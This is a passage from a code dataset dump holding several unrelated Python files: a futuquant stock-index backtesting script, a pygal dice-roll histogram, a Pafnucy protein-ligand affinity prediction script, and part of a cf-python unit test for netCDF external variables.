copyList.copy\n\n","sub_path":"algorithm-playground/dp/dp.py","file_name":"dp.py","file_ext":"py","file_size_in_byte":13473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"27860108","text":"from futuquant import *\nimport time\nimport math\nimport random\nimport matplotlib.pyplot as plt\n\n\nclass broker:\n def __init__(self, api_svr_ip, api_svr_port):\n self.api_svr_ip = api_svr_ip\n self.api_svr_port = api_svr_port\n\n def connect_api(self):\n self.quote_ctx = OpenQuoteContext(host=self.api_svr_ip, port=self.api_svr_port)\n self.tradehk_ctx = OpenHKTradeContext(self.api_svr_ip, self.api_svr_port)\n ret_code, ret_data = self.tradehk_ctx.unlock_trade(\"584679\")\n\n def get_day_k(self ):\n code = 'HK.800000'\n num = 999\n ktype = \"K_15M\"\n sum = 0\n ret, ret_date = self.quote_ctx.subscribe(code, ktype)\n if ret != 0:\n print(\"subscribe fail\")\n print(ret_date)\n return -1, 0\n #code time_key open close high low volume turnover pe_ratio turnover_rate\n ret_code, ret_data = self.quote_ctx.get_cur_kline(code, num, ktype, autype='qfq')\n if ret_code != 0:\n print(ret_data)\n return -1, ret_data\n\n ret_data[\"MA4\"] = 0.0\n ret_data[\"MA4_I\"] = 0.0\n ret_data[\"MA4_R_T3\"] = 0.0\n for i in range(3, num):\n ret_data.iloc[i, 10] = ( ret_data.iloc[i, 3] + ret_data.iloc[i - 1, 3] + ret_data.iloc[i - 2, 3] + ret_data.iloc[i - 3, 3])/4\n ret_data.iloc[i, 11] = ( ret_data.iloc[i, 2] + ret_data.iloc[i - 1, 3] + ret_data.iloc[i - 2, 3] + ret_data.iloc[i - 3, 3])/4\n\n for i in range(6, num):\n ret_data.iloc[i, 12] = ( ret_data.iloc[i, 11] - ret_data.iloc[i - 3, 11] )/3\n\n\n for i in range(4, num):\n date_time_p = ret_data.iloc[i - 1, 1]\n date_p = date_time_p.split(\" \")[0]\n date_time_c = ret_data.iloc[i, 1]\n date_c = date_time_c.split(\" \")[0]\n if date_c == date_p:\n pass\n else:\n close_p = ret_data.iloc[i - 1, 3]\n open_c = ret_data.iloc[i, 2]\n gap = open_c - close_p\n ma4_r = ret_data.iloc[i, 12]\n rst = ret_data.iloc[i, 3] - ret_data.iloc[i, 2]\n if gap < 0:\n if ma4_r > 0:\n trade_ret = rst\n else:\n trade_ret = 0\n else:\n if ma4_r > 0:\n trade_ret = 0\n else:\n trade_ret = rst * (-1)\n\n\n\n print(\"**** \" + date_c)\n print(\" \" + \"Gap: \" + str(gap))\n print(\" \" + \"Rat: \" + str(ma4_r))\n print(\" \" + \"Ret: \" + str(rst))\n print(\" \" + \"Trade Result \" + str(trade_ret))\n sum += trade_ret\n print(\"Total: \" + str(sum))\n return 0, ret_data\n\n def test_random_5M_history(self, start, end):\n code = 'HK.800000'\n # #66 5mK per day\n ktype = \"K_5M\"\n\n ## BEAR\n type = -1\n\n sum = 0\n # code time_key open close high low pe_ratio turnover_rate volume turnover change_rate MA4 MA4_I MA4_R_T3 trade_result\n pos_open = 2\n pos_close = 3\n pos_high = 4\n pos_low = 5\n pos_ma4 = 11\n pos_ma4_i = 12\n pos_ma4_r = 13\n pos_test_result = 14\n ret, ret_data = self.get_history_k(code, start, end, ktype)\n if ret != 0:\n print(\"get history fail\")\n print(ret_data)\n return -1, 0\n num = len(ret_data)\n ret_data[\"MA4\"] = 0.0\n ret_data[\"MA4_I\"] = 0.0\n ret_data[\"MA4_R_T3\"] = 0.0\n ret_data[\"trade_result\"] = 0.0\n for i in range(3, num):\n ret_data.iloc[i, pos_ma4] = ( ret_data.iloc[i, 3] + ret_data.iloc[i - 1, 3] + ret_data.iloc[i - 2, 3] + ret_data.iloc[i - 3, 3])/4\n ret_data.iloc[i, pos_ma4_i] = ( ret_data.iloc[i, 2] + ret_data.iloc[i - 1, 3] + ret_data.iloc[i - 2, 3] + ret_data.iloc[i - 3, 3])/4\n\n for i in range(6, num):\n ret_data.iloc[i, pos_ma4_r] = ( ret_data.iloc[i, pos_ma4_i] - ret_data.iloc[i - 3, pos_ma4_i] )/3\n\n sum_up = 0\n sum_down = 0\n for i in range(4, num):\n date_time_p = ret_data.iloc[i - 1, 1]\n date_p = date_time_p.split(\" \")[0]\n date_time_c = ret_data.iloc[i, 1]\n date_c = date_time_c.split(\" \")[0]\n\n\n if date_c == date_p:\n pass\n else:\n cnt = random.randint(2,65)\n buy_bar_num = i + cnt - 1\n buy_price = ret_data.iloc[i, pos_open]\n min = ret_data.iloc[i, pos_low]\n max = ret_data.iloc[i, pos_high]\n for j in range(buy_bar_num + cnt - 1, buy_bar_num + 65):\n low = ret_data.iloc[j, pos_low]\n high = ret_data.iloc[j, pos_high]\n if low < min:\n min = low\n if high > max:\n max = high\n print(ret_data.iloc[buy_bar_num, 1])\n\n float_up = max - buy_price\n float_down = min - buy_price\n sum_up += float_up\n sum_down += float_down\n date = ret_data.iloc[buy_bar_num, 1]\n print(\"**** \" + date_c + \" \" + str(date))\n print(\" \" + \"UP : \" + str(float_up))\n print(\" \" + \"DOWN: \" + str(float_down))\n\n\n\n\n return 0, ret_data\n\n def test_magment_15M_history(self, start, end):\n code = 'HK.800000'\n\n ktype = \"K_15M\"\n sum = 0\n # code time_key open close high low pe_ratio turnover_rate volume turnover change_rate MA4 MA4_I MA4_R_T3 trade_result\n pos_open = 2\n pos_close = 3\n pos_ma4 = 11\n pos_ma4_i = 12\n pos_ma4_r = 13\n pos_test_result = 14\n ret, ret_data = self.get_history_k(code, start, end, ktype)\n if ret != 0:\n print(\"get history fail\")\n print(ret_data)\n return -1, 0\n num = len(ret_data)\n ret_data[\"MA4\"] = 0.0\n ret_data[\"MA4_I\"] = 0.0\n ret_data[\"MA4_R_T3\"] = 0.0\n ret_data[\"trade_result\"] = 0.0\n for i in range(3, num):\n ret_data.iloc[i, pos_ma4] = ( ret_data.iloc[i, 3] + ret_data.iloc[i - 1, 3] + ret_data.iloc[i - 2, 3] + ret_data.iloc[i - 3, 3])/4\n ret_data.iloc[i, pos_ma4_i] = ( ret_data.iloc[i, 2] + ret_data.iloc[i - 1, 3] + ret_data.iloc[i - 2, 3] + ret_data.iloc[i - 3, 3])/4\n\n for i in range(6, num):\n ret_data.iloc[i, pos_ma4_r] = ( ret_data.iloc[i, pos_ma4_i] - ret_data.iloc[i - 3, pos_ma4_i] )/3\n\n\n for i in range(4, num):\n date_time_p = ret_data.iloc[i - 1, 1]\n date_p = date_time_p.split(\" \")[0]\n date_time_c = ret_data.iloc[i, 1]\n date_c = date_time_c.split(\" \")[0]\n if date_c == date_p:\n pass\n else:\n close_p = ret_data.iloc[i - 1, 3]\n open_c = ret_data.iloc[i, 2]\n gap = open_c - close_p\n ma4_r = ret_data.iloc[i, pos_ma4_r]\n rst = ret_data.iloc[i, 3] - ret_data.iloc[i, 2]\n ## Gao Kai\n if gap > 0:\n trade_ret = rst * (-1)\n pass\n ## Di Kai\n else:\n trade_ret = rst\n ret_data.iloc[i, pos_test_result] = trade_ret\n print(\"**** \" + date_c)\n print(\" \" + \"Gap: \" + str(gap))\n print(\" \" + \"Rat: \" + str(ma4_r))\n print(\" \" + \"Ret: \" + str(rst))\n print(\" \" + \"Trade Result \" + str(trade_ret))\n sum += trade_ret\n print(\"Total: \" + str(sum))\n\n # for i in range(4, num):\n # if ret_data.iloc[i, pos_test_result]!=0:\n # print( ret_data.iloc[i, pos_test_result])\n\n\n\n return 0, ret_data\n\n def test_boll(self, start, end):\n #code time_key open close high low pe_ratio turnover_rate volume turnover change_rate\n # 0 1 2 3 4 5 6 7 8 9 10\n\n code = 'HK.800000'\n ktype = \"K_15M\"\n\n ret, ret_data = self.get_history_k(code, start, end, ktype)\n if ret != 0:\n print(\"get history fail\")\n print(ret_data)\n return -1, 0\n num = len(ret_data)\n\n\n\n # BOLL Paras\n boll_n = 20\n boll_k = 2\n\n\n pos_k_open = 2\n pos_k_close = 3\n pos_k_high = 4\n pos_k_low = 5\n\n pos_boll_mid = 11\n pos_boll_upper = 12\n pos_boll_lower = 13\n pos_boll_mid_i = 14\n pos_boll_upper_i = 15\n pos_boll_lower_i = 16\n ret_data[\"BOLL_MID\"] = 0.0\n ret_data[\"BOLL_UPPER\"] = 0.0\n ret_data[\"BOLL_LOWER\"] = 0.0\n ret_data[\"BOLL_MID_I\"] = 0.0\n ret_data[\"BOLL_UPPER_I\"] = 0.0\n ret_data[\"BOLL_LOWER_I\"] = 0.0\n for i in range(boll_n - 1, num):\n # 1. MA\n ma = 0\n for j in range(i - boll_n + 1, i):\n ma += ret_data.iloc[j, pos_k_close] / boll_n\n\n ma_i = ma + ret_data.iloc[i, pos_k_open] / boll_n\n ma = ma + ret_data.iloc[i, pos_k_close] / boll_n\n\n\n # 2. Sigma\n val = 0\n for j in range(i - boll_n + 1, i + 1):\n val += ((ret_data.iloc[j, pos_k_close] - ma)**2)/boll_n\n sigma = math.sqrt(val)\n\n val = 0\n for j in range(i - boll_n + 1, i):\n val += ((ret_data.iloc[j, pos_k_close] - ma_i)**2)/boll_n\n val += ((ret_data.iloc[i, pos_k_open] - ma_i) ** 2) / boll_n\n sigma_i = math.sqrt(val)\n\n # 3. Upper & Lower\n upper = ma + boll_k * sigma\n lower = ma - boll_k * sigma\n\n upper_i = ma_i + boll_k * sigma_i\n lower_i = ma_i - boll_k * sigma_i\n\n ret_data.iloc[i, pos_boll_mid] = ma\n ret_data.iloc[i, pos_boll_upper] = upper\n ret_data.iloc[i, pos_boll_lower] = lower\n\n ret_data.iloc[i, pos_boll_mid_i] = ma_i\n ret_data.iloc[i, pos_boll_upper_i] = upper_i\n ret_data.iloc[i, pos_boll_lower_i] = lower_i\n\n\n ## Strategy and Test\n ## Let's see a new day opens on which part\n date = []\n boll_upper = []\n boll_lower = []\n high = []\n low = []\n start = []\n end = []\n for i in range(boll_n - 1, num):\n date_time_p = ret_data.iloc[i - 1, 1]\n date_p = date_time_p.split(\" \")[0]\n date_time_c = ret_data.iloc[i, 1]\n date_c = date_time_c.split(\" \")[0]\n if date_c == date_p:\n pass\n else:\n if ret_data.iloc[i, pos_k_open] > ret_data.iloc[i - 1, pos_k_close] and \\\n ret_data.iloc[i, pos_k_low] <= (ret_data.iloc[i, pos_boll_lower_i] - 10 ) and \\\n ret_data.iloc[i, pos_k_open] > ret_data.iloc[i, pos_boll_lower_i]:\n\n date.append(date_c)\n boll_upper.append(ret_data.iloc[i, pos_boll_upper_i])\n boll_lower.append(ret_data.iloc[i, pos_boll_lower_i])\n high.append(ret_data.iloc[i, pos_k_high])\n low.append(ret_data.iloc[i, pos_k_low])\n start.append(ret_data.iloc[i, pos_k_open])\n end.append(ret_data.iloc[i, pos_k_close])\n print(date_c + \" :\" + str(ret_data.iloc[i, pos_k_close] - ret_data.iloc[i, pos_boll_lower_i]))\n\n plt.plot(boll_upper, 'r--')\n plt.plot(boll_lower, 'r--')\n #plt.plot(high, 'g^')\n plt.plot(low, 'gv')\n #plt.plot(start, '.')\n plt.plot(end, '.')\n plt.show()\n\n return 0, ret_data\n\n\n def get_cn_list(self):\n cn_list = []\n market = \"SH\"\n market = \"HK\"\n plate_class = \"ALL\"\n\n ret_code, ret_data = self.quote_ctx.get_plate_list( market, plate_class)\n if ret_code != 0:\n return -1, cn_list\n print(\"Get Plate Done.\")\n print(ret_data)\n\n plate_list = ret_data['code']\n for plate_code in plate_list:\n ret_code, ret_data = self.quote_ctx.get_plate_stock(plate_code)\n if ret_code != 0:\n print(\"ERR \" + str(plate_code))\n for code in ret_data[\"code\"]:\n cn_list.append(code)\n print(str(plate_code) + \" Done.\")\n time.sleep(1)\n\n return 0, cn_list\n\n def get_history_k(self, code, start, end, ktype='K_DAY'):\n ret_code, ret_data = self.quote_ctx.get_history_kline(code, start, end, ktype, autype='qfq'\n )\n if ret_code != 0:\n return -1, []\n return 0, ret_data\n\n def find_warrent(self):\n ret_code, ret_data = self.quote_ctx.get_stock_basicinfo(\"HK\", stock_type='WARRANT')\n if ret_code != 0:\n return -1, cn_list\n print(\"Get WARRENT Done.\")\n print(ret_data)\n\n def get_acc_info(self):\n ret_code, ret_data = self.tradehk_ctx.accinfo_query(0)\n if ret_code != 0:\n print(\"Fail\")\n print(ret_data)\n try:\n print(ret_data[\"ZQSZ\"][0])\n print(ret_data[\"KQXJ\"][0])\n print(ret_data[\"ZSJE\"][0])\n print(ret_data[\"YYJDE\"][0])\n print(ret_data[\"Power\"][0])\n except:\n print(\"???\")\n if ret_data[\"ZCJZ\"][0] > 10000:\n print(\"OK\")\n\n\n\n ret_code, ret_data = self.tradehk_ctx.position_list_query(strcode='', stocktype='', pl_ratio_min='', pl_ratio_max='',\n envtype=0)\n if ret_code != 0:\n print(\"Fail\")\n print(ret_data)\n\n\n\n\ndef fitting_shape_cup(df_k_line):\n k_line = df_k_line\n cnt = len(k_line)\n #prices_close = k_line['close']\n prices_high = []\n for price in df_k_line[\"high\"]:\n prices_high.append(price)\n\n random_point_c = cnt - 1 # 随机选取random_point_c代表今天\n\n # Find B\n para_gama = 1 # gama为B点相对于C点高度的系数\n para_span_request_bc = 3 # B点与C点之间的周数至少为span_request_bc\n ret, point_b = shape_cup_find_b(prices_high, random_point_c, para_gama, para_span_request_bc)\n if ret != -1:\n print(\"B found\")\n # Find A\n omega = 1.05 # omega为A点相对于B点高度的系数\n span = 7 # span为时间跨度的周数\n ret, point_a = shape_cup_find_a(prices_high, point_b, omega, span)\n if ret != -1:\n print(\"A found\")\n print(df_k_line.iloc[point_a,])\n print(df_k_line.iloc[point_b,])\n else:\n print(\"A not found\")\n else:\n print(\"B not found\")\n\n return\n\ndef shape_cup_find_b(prices_high, random_point_c, gama, span_request_bc):\n ret = -1\n val = -1\n cnt = len(prices_high)\n for i in range(cnt - random_point_c + span_request_bc + 1, cnt):\n if prices_high[-i] > gama * prices_high[random_point_c]:\n if prices_high[-i - 1] > prices_high[-i]:\n continue\n else:\n point_b = cnt - i + 1\n if point_b > random_point_c:\n ret = -1\n break\n else:\n print(point_b)\n val = point_b\n ret = 0\n break\n return ret, val\n\ndef shape_cup_find_a(prices_high, point_b, omega, span):\n ret = -1\n val = -1\n cnt = len(prices_high)\n for i in range(cnt - point_b + span + 1, cnt):\n if prices_high[-i] > omega * prices_high[point_b]:\n if prices_high[-i - 1] > prices_high[-i]:\n continue\n else:\n point_a = cnt - i + 1\n if point_a > point_b:\n ret = -1\n break\n else:\n one_third = int(point_a + (point_b - point_a) / 3)\n two_third = int(point_a + (point_b - point_a) * 2 / 3)\n List = [prices_high[k] > max(prices_high[one_third], prices_high[two_third]) for k in\n range(one_third + 1, two_third)]\n if True in List:\n continue\n else:\n print(point_a)\n ret = 0\n val = point_a\n break\n return ret, val\n\n\n\n\nif __name__ == \"__main__\":\n API_RM_SVR_IP = '119.29.141.202'\n API_LO_SVR_IP = '127.0.0.1'\n API_SVR_PORT = 11111\n b = broker(API_LO_SVR_IP, API_SVR_PORT)\n b.connect_api()\n #b.test_boll()\n start = '2017-12-20'\n end = '2018-06-30'\n #ret, k = b.test_boll(start, end)\n ret, k = b.get_history_k(\"HK.800000\", start, end, \"K_5M\")\n if ret == -1:\n print(\"fail\")\n cycle = 9\n test_day = '2018-07-09'\n test_day2 = '2018-07-20'\n ret, test_set = b.get_history_k(\"HK.800000\", test_day2, test_day2, \"K_5M\")\n if ret == -1:\n print(\"fail\")\n #print(test_set)\n test_ret = [[],[]]\n cnt = 0\n for i in range(1, len(k)):\n date_time_p = k.iloc[i - 1, 1]\n date_p = date_time_p.split(\" \")[0]\n date_time_c = k.iloc[i, 1]\n date_c = date_time_c.split(\" \")[0]\n if date_c == date_p:\n pass\n else:\n cnt +=1\n # Get highest and lowest of src\n src_h = k.iloc[i, 3]\n src_l = k.iloc[i, 3]\n for j in range(0, cycle):\n if k.iloc[i + j, 3] > src_h:\n src_h = k.iloc[i + j, 3]\n if k.iloc[i + j, 3] < src_l:\n src_l = k.iloc[i + j, 3]\n\n # Get highest and lowest of test\n tet_h = test_set.iloc[0, 3]\n tet_l = test_set.iloc[0, 3]\n for j in range(0, cycle):\n if k.iloc[ j, 3] > tet_h:\n tet_h = test_set.iloc[0 + j, 3]\n if k.iloc[ j, 3] < tet_l:\n tet_l = test_set.iloc[0 + j, 3]\n\n # Calculate derivative\n delta = (src_h - src_l) - (tet_h - tet_l)\n single_ret_list = []\n for t in range(0, abs(int(delta)) + 1):\n der = 0\n for j in range(0, cycle):\n if delta > 0:\n unit1 = (k.iloc[i + j, 2] - src_l) - (test_set.iloc[0 + j, 2] - tet_l + t)\n unit2 = (k.iloc[i + j, 3] - src_l) - (test_set.iloc[0 + j, 3] - tet_l + t)\n unit3 = (k.iloc[i + j, 4] - src_l) - (test_set.iloc[0 + j, 4] - tet_l + t)\n unit4 = (k.iloc[i + j, 5] - src_l) - (test_set.iloc[0 + j, 5] - tet_l + t)\n else:\n unit1 = (k.iloc[i + j, 2] - src_l + t) - (test_set.iloc[0 + j, 2] - tet_l)\n unit2 = (k.iloc[i + j, 3] - src_l + t) - (test_set.iloc[0 + j, 3] - tet_l)\n unit3 = (k.iloc[i + j, 4] - src_l + t) - (test_set.iloc[0 + j, 4] - tet_l)\n unit4 = (k.iloc[i + j, 5] - src_l + t) - (test_set.iloc[0 + j, 5] - tet_l)\n der += (unit1 * unit1 + unit2 * unit2 + unit3 * unit3 + unit4 * unit4)\n single_ret_list.append(der)\n # find smallest der\n\n min_val = single_ret_list[0]\n for val in single_ret_list:\n if val < min_val:\n min_val = val\n\n # Done\n test_ret[0].append(date_c)\n test_ret[1].append(min_val)\n\n\n # Print result\n min_day = test_ret[1][0]\n min_pos = 0\n for i in range(0, cnt):\n if test_ret[1][i] < min_day:\n min_day = test_ret[1][i]\n min_pos = i\n print(test_ret[0][min_pos])\n print(test_ret[1][min_pos])\n for i in range(1, len(k)):\n date_time_p = k.iloc[i - 1, 1]\n date_p = date_time_p.split(\" \")[0]\n date_time_c = k.iloc[i, 1]\n date_c = date_time_c.split(\" \")[0]\n if date_c == date_p:\n pass\n else:\n if date_c == test_ret[0][min_pos]:\n for n in range(0, 5):\n d1 = k.iloc[i + cycle - 1 + n, 2] - k.iloc[i + cycle - 1 + n, 2]\n d2 = k.iloc[i + cycle - 1 + n, 3] - k.iloc[i + cycle - 1 + n, 2]\n d3 = k.iloc[i + cycle - 1 + n, 4] - k.iloc[i + cycle - 1 + n, 2]\n d4 = k.iloc[i + cycle - 1 + n, 5] - k.iloc[i + cycle - 1 + n, 2]\n print(str(d1) + \" \" + str(d2) +\" \"+ str(d3) + \" \"+str(d4))\n print(\" \")\n print(test_day2)\n for n in range(0, 5):\n d1 = test_set.iloc[cycle - 1 + n, 2] - test_set.iloc[cycle - 1 + n, 2]\n d2 = test_set.iloc[cycle - 1 + n, 3] - test_set.iloc[cycle - 1 + n, 2]\n d3 = test_set.iloc[cycle - 1 + n, 4] - test_set.iloc[cycle - 1 + n, 2]\n d4 = test_set.iloc[cycle - 1 + n, 5] - test_set.iloc[cycle - 1 + n, 2]\n print(str(d1) + \" \" + str(d2) + \" \" + str(d3) + \" \" + str(d4))\n\n\n\n\n exit(0)\n b.get_acc_info()\n\n\n ret, cn_list = b.find_warrent()\n if ret != -1:\n print(cn_list)\n\n\n start = '2005-01-04'\n end = '2016-04-29'\n code = 'SZ.000639'\n ret, k = b.get_history_k(code, start, end)\n if ret != -1:\n print(\"ok\")\n k.to_csv(\"C:\\\\15M_history.csv\", index=False)\n print(\"Saved\")\n #print(k)\n\n #fitting_shape_cup(k)\n\n","sub_path":"samples/cn_list.py","file_name":"cn_list.py","file_ext":"py","file_size_in_byte":21696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"368505833","text":"\nimport pygal\n\nfrom die import Die\n\n# # 创建一个 D6\n# die_1 = Die()\n# die_2 = Die()\n\n# # 掷几次骰子,并将结果存储在一个列表中\n# results = []\n# for roll_num in range(1000):\n# \tresult = die_1.roll() + die_2.roll()\n# \tresults.append(result)\n\n# # 分析结果\n# frequencies = []\n# max_result = die_1.num_sides + die_2.num_sides\n# for value in range(2, max_result+1):\n# \tfreuency = results.count(value)\n# \tfrequencies.append(freuency)\n\n# # print(frequencies)\n\n# # 对结果进行可视化\n# hist = pygal.Bar()\n\n# hist.title = \"Results of rolling one D6 1000 times.\"\n# hist.x_labels = ['2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12']\n# hist.x_title = 'Result'\n# hist.y_title = \"Frequency of Result\"\n\n# hist.add('D6 + D6', frequencies)\n# hist.render_to_file('die_visual_2.svg')\n\n\ndie_1 = Die()\ndie_2 = Die(10)\n\nresults = []\nfor roll_num in range(50000):\n\tresult = die_1.roll() + die_2.roll()\n\tresults.append(result)\n\nfrequencies = []\nmax_result = die_1.num_sides + die_2.num_sides\nfor value in range(2, max_result + 1):\n\tfreuency = results.count(value)\n\tfrequencies.append(freuency)\n\nhist = pygal.Bar()\n\nhist.title = \"Results of rolling a D6 and a D10 5,000 times.\"\nhist.x_labels = list(range(2, max_result + 1))\nhist.x_title = \"Result\"\nhist.y_title = 'Frequency of Result'\n\nhist.add('D6 + D10', frequencies)\nhist.render_to_file('dice_visual_2.svg')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"python(第二次)/pygal/die_visual.py","file_name":"die_visual.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"12470793","text":"# Scores molecular complexes by running them through Pafnucy\n\nimport numpy as np\nimport pandas as pd\nimport h5py\n\nimport tensorflow as tf\nfrom tfbio.data import Featurizer, make_grid\n\nimport os\n\n\ndef input_file(path):\n \"\"\"Check if input file exists.\"\"\"\n\n path = os.path.abspath(path)\n if not os.path.exists(path):\n raise IOError('File %s does not exist.' % path)\n return path\n\n\ndef network_prefix(path):\n \"\"\"Check if all file required to restore the network exists.\"\"\"\n\n from glob import glob\n dir_path, file_name = os.path.split(path)\n path = os.path.join(os.path.abspath(dir_path), file_name)\n\n for extension in ['index', 'meta', 'data*']:\n file_name = '%s.%s' % (path, extension)\n\n # use glob instead of os because we need to expand the wildcard\n if len(glob(file_name)) == 0:\n raise IOError('File %s does not exist.' % file_name)\n\n return path\n\n\ndef batch_size(value):\n \"\"\"Check if batch size is a non-negative integer\"\"\"\n\n value = int(value)\n if value < 0:\n raise ValueError('Batch size must be positive, %s given' % value)\n return value\n\n\ndef output_file(path):\n \"\"\"Check if output file can be created.\"\"\"\n\n path = os.path.abspath(path)\n dirname = os.path.dirname(path)\n\n if not os.access(dirname, os.W_OK):\n raise IOError('File %s cannot be created (check your permissions).'\n % path)\n return path\n\n\ndef string_bool(s):\n s = s.lower()\n if s in ['true', 't', '1', 'yes', 'y']:\n return True\n elif s in ['false', 'f', '0', 'no', 'n']:\n return False\n else:\n raise IOError('%s cannot be interpreted as a boolean' % s)\n\n\nimport argparse\nparser = argparse.ArgumentParser(\n description='Predict affinity with the network',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n epilog='''This script reads the structures of complexes from HDF file and\n predicts binding affinity for each comples. The input can be prepared with\n prepare.py script. If you want to prepare the data and run the model manualy\n use functions defined in utils module.\n '''\n)\n\nparser.add_argument('--input', '-i', required=True, type=input_file,\n help='HDF file with prepared structures')\nparser.add_argument('--network', '-n', type=network_prefix,\n default='results/batch5-2017-06-05T07:58:47-best',\n help='prefix for the files with the network'\n 'Be default we use network trained on PDBbind v. 2016')\nparser.add_argument('--grid_spacing', '-g', default=1.0, type=float,\n help='distance between grid points used during training')\nparser.add_argument('--max_dist', '-d', default=10.0, type=float,\n help='max distance from complex center used during training')\nparser.add_argument('--batch', '-b', type=batch_size,\n default=20,\n help='batch size. If set to 0, predict for all complexes at once.')\nparser.add_argument('--charge_scaler', type=float, default=0.425896,\n help='scaling factor for the charge'\n ' (use the same factor when preparing data for'\n ' training and and for predictions)')\nparser.add_argument('--output', '-o', type=output_file,\n default='./predictions.csv',\n help='name for the CSV file with the predictions')\nparser.add_argument('--verbose', '-v', type=string_bool,\n default=True,\n help='whether to print messages')\n\n\nargs = parser.parse_args()\n\n# TODO: avarage prediction for different rotations (optional)\n\nfeaturizer = Featurizer()\n\ncharge_column = featurizer.FEATURE_NAMES.index('partialcharge')\n\ncoords = []\nfeatures = []\nnames = []\n\nwith h5py.File(args.input, 'r') as f:\n for name in f:\n names.append(name)\n dataset = f[name]\n coords.append(dataset[:, :3])\n features.append(dataset[:, 3:])\n\n\nif args.verbose:\n print('loaded %s complexes\\n' % len(coords))\n\n\ndef __get_batch():\n\n batch_grid = []\n\n if args.verbose:\n if args.batch == 0:\n print('predict for all complexes at once\\n')\n else:\n print('%s samples per batch\\n' % args.batch)\n\n for crd, f in zip(coords, features):\n batch_grid.append(make_grid(crd, f, max_dist=args.max_dist,\n grid_resolution=args.grid_spacing))\n if len(batch_grid) == args.batch:\n # if batch is not specified it will never happen\n batch_grid = np.vstack(batch_grid)\n batch_grid[..., charge_column] /= args.charge_scaler\n yield batch_grid\n batch_grid = []\n\n if len(batch_grid) > 0:\n batch_grid = np.vstack(batch_grid)\n batch_grid[..., charge_column] /= args.charge_scaler\n yield batch_grid\n\n\nsaver = tf.train.import_meta_graph('%s.meta' % args.network,\n clear_devices=True)\n\n\npredict = tf.get_collection('output')[0]\ninp = tf.get_collection('input')[0]\nkp = tf.get_collection('kp')[0]\n\nif args.verbose:\n print('restored network from %s\\n' % args.network)\n\nwith tf.Session() as session:\n saver.restore(session, args.network)\n predictions = []\n batch_generator = __get_batch()\n for grid in batch_generator:\n # TODO: remove kp in next release\n # it's here for backward compatibility\n predictions.append(session.run(predict, feed_dict={inp: grid, kp: 1.0}))\n\nresults = pd.DataFrame({'name': names,\n 'prediction': np.vstack(predictions).flatten()})\nresults.to_csv(args.output, index=False)\nif args.verbose:\n print('results saved to %s' % args.output)\n","sub_path":"Retraining Scripts/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":5749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"309213172","text":"import datetime\nimport os\nimport tempfile\nimport unittest\n\nimport numpy\n\nimport cf\n\n\nclass ExternalVariableTest(unittest.TestCase):\n def setUp(self):\n self.parent_file = os.path.join(\n os.path.dirname(os.path.abspath(__file__)), 'parent.nc')\n self.external_file = os.path.join(os.path.dirname(\n os.path.abspath(__file__)), 'external.nc')\n self.combined_file = os.path.join(os.path.dirname(\n os.path.abspath(__file__)), 'combined.nc')\n self.external_missing_file = os.path.join(\n os.path.dirname(os.path.abspath(__file__)), 'external_missing.nc')\n\n self.test_only = []\n\n (fd, self.tempfilename) = tempfile.mkstemp(\n suffix='.nc', prefix='cf_', dir='.')\n os.close(fd)\n (fd, self.tempfilename_parent) = tempfile.mkstemp(\n suffix='.nc', prefix='cf_parent_', dir='.')\n os.close(fd)\n (fd, self.tempfilename_external) = tempfile.mkstemp(\n suffix='.nc', prefix='cf_external_', dir='.')\n os.close(fd)\n\n def tearDown(self):\n os.remove(self.tempfilename)\n os.remove(self.tempfilename_parent)\n os.remove(self.tempfilename_external)\n\n def test_EXTERNAL_READ(self):\n if self.test_only and inspect.stack()[0][3] not in self.test_only:\n return\n\n # Read the parent file on its own, without the external file\n f = cf.read(self.parent_file, verbose=0)\n\n for i in f:\n _ = repr(i)\n _ = str(i)\n _ = i.dump(display=False)\n\n self.assertEqual(len(f), 1)\n f = f[0]\n\n cell_measure = f.constructs.filter_by_identity('measure:area').value()\n\n self.assertTrue(cell_measure.nc_get_external())\n self.assertEqual(cell_measure.nc_get_variable(), 'areacella')\n self.assertEqual(cell_measure.properties(), {})\n self.assertFalse(cell_measure.has_data())\n\n # External file contains only the cell measure variable\n f = cf.read(self.parent_file, external=[self.external_file],\n verbose=0)\n\n c = cf.read(self.combined_file, verbose=0)\n\n for i in c + f:\n _ = repr(i)\n _ = str(i)\n _ = i.dump(display=False)\n\n cell_measure = f[0].constructs.filter_by_identity(\n 'measure:area').value()\n\n self.assertEqual(len(f), 1)\n self.assertEqual(len(c), 1)\n\n for i in range(len(f)):\n self.assertTrue(c[i].equals(f[i], verbose=2))\n\n # External file contains other variables\n f = cf.read(self.parent_file, external=self.combined_file,\n verbose=0)\n\n for i in f:\n _ = repr(i)\n _ = str(i)\n _ = i.dump(display=False)\n\n self.assertEqual(len(f), 1)\n self.assertEqual(len(c), 1)\n\n for i in range(len(f)):\n self.assertTrue(c[i].equals(f[i], verbose=2))\n\n # Two external files\n f = cf.read(\n self.parent_file,\n external=[self.external_file, self.external_missing_file],\n verbose=0\n )\n\n for i in f:\n _ = repr(i)\n _ = str(i)\n _ = i.dump(display=False)\n\n self.assertEqual(len(f), 1)\n self.assertEqual(len(c), 1)\n\n for i in range(len(f)):\n self.assertTrue(c[i].equals(f[i], verbose=2))\n\n def test_EXTERNAL_WRITE(self):\n if self.test_only and inspect.stack()[0][3] not in self.test_only:\n return\n\n parent = cf.read(self.parent_file)\n combined = cf.read(self.combined_file)\n\n # External file contains only the cell measure variable\n f = cf.read(self.parent_file, external=self.external_file)\n\n cf.write(f, self.tempfilename)\n g = cf.read(self.tempfilename)\n\n self.assertEqual(len(g), len(combined))\n\n for i in range(len(g)):\n self.assertTrue(combined[i].equals(g[i], verbose=2))\n\n cell_measure = g[0].constructs('measure:area').value()\n\n self.assertFalse(cell_measure.nc_get_external())\n cell_measure.nc_set_external(True)\n self.assertTrue(cell_measure.nc_get_external())\n self.assertTrue(cell_measure.properties())\n self.assertTrue(cell_measure.has_data())\n\n self.assertTrue(\n g[0].constructs.filter_by_identity(\n 'measure:area').value().nc_get_external()\n )\n\n 